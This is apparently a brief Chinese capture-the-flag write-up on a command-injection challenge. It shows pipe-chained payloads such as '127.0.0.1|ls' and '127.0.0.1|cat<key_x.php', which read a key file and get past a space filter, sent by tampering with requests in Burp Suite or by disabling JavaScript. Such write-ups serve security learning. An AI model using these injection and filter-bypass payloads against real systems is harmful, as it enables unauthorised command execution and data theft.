一.解题思路
利用管道符构造命令
二.操作步骤
解法一
1.测试127.0.0.1能否返回正常数据
![在这里插入图片描述](https://img-blog.csdnimg.cn/20201017151303368.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3Bsb3RvX2Nz,size_16,color_FFFFFF,t_70#pic_center)
2.使用BP抓包,改包
查看文件信息 iipp = 127.0.0.1|ls
![在这里插入图片描述](https://img-blog.csdnimg.cn/20201017151307818.png#pic_center)
查看key文件信息 iipp = 127.0.0.1|cat key_x.php
但是发现不能正常传输数据,空格被过滤。命令改为iipp = 127.0.0.1|cat<key_x.php
![在这里插入图片描述](https://img-blog.csdnimg.cn/2020101715131360.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3Bsb3RvX2Nz,size_16,color_FFFFFF,t_70#pic_center)
解法二
1.在火狐中禁用JS
在URL中输入about:config 开启火狐高级设置
![在这里插入图片描述](https://img-blog.csdnimg.cn/20201017151317720.png#pic_center)
2.命令127.0.0.1|ls
![在这里插入图片描述](https://img-blog.csdnimg.cn/20201017151321315.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3Bsb3RvX2Nz,size_16,color_FFFFFF,t_70#pic_center)
3.命令127.0.0.1|cat<key_x.php
![在这里插入图片描述](https://img-blog.csdnimg.cn/20201017151324779.png#pic_center)
网络信息安全-ploto